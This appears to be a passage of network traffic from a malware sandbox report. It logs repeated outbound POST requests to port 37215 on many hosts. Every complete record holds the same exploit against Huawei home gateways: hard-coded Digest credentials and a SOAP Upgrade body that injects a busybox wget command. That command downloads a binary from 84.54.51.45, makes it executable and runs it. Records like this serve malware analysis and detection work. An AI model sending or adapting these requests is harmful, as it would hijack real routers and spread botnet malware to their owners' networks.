                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2413192.168.2.154688841.89.49.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810952902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2414192.168.2.154573841.15.100.14437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810986042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2415192.168.2.154618641.195.100.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811002970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2416192.168.2.153616641.17.116.037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811028957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2417192.168.2.155774241.29.167.11737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811079979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2418192.168.2.154108441.242.163.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811103106 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2419192.168.2.155021841.167.218.8937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811187029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2420192.168.2.156070441.170.127.7037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811517954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2421192.168.2.155692841.165.47.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811551094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2422192.168.2.153301041.65.3.17437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.811574936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
